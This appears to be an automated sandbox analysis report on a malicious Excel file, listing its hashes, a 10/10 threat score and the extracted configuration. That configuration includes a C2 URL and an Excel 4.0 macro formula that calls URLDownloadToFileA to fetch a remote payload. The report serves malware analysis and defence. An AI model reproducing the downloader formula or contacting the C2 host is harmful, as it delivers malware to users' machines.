Overview

overview

10

Static

static

10

document-1...84.xls

windows7_x64

10

document-1...84.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    document-1851347184.xls

  • Size

    39KB

  • MD5

    8a90be28fd5b15dac37b54acf61257dd

  • SHA1

    e7e8c7afa5b6912cfbef5813b54561f5c4cdc222

  • SHA256

    fa75ad49ae3f01c066c035c79098f15915375e8ead1840bee03cb16fafd98425

  • SHA512

    5e2eb198ca5cae3a7d314c0f4cfd6c61d5114a5737bfe4379bd0225f2cb21ad00b20b9c0443ab61bb8b6c208e4a3ff42a4c2d65832909c7fabaadfebb516f950

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://ttj10qrrqx03kdts.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • document-1851347184.xls
    .xls windows office2003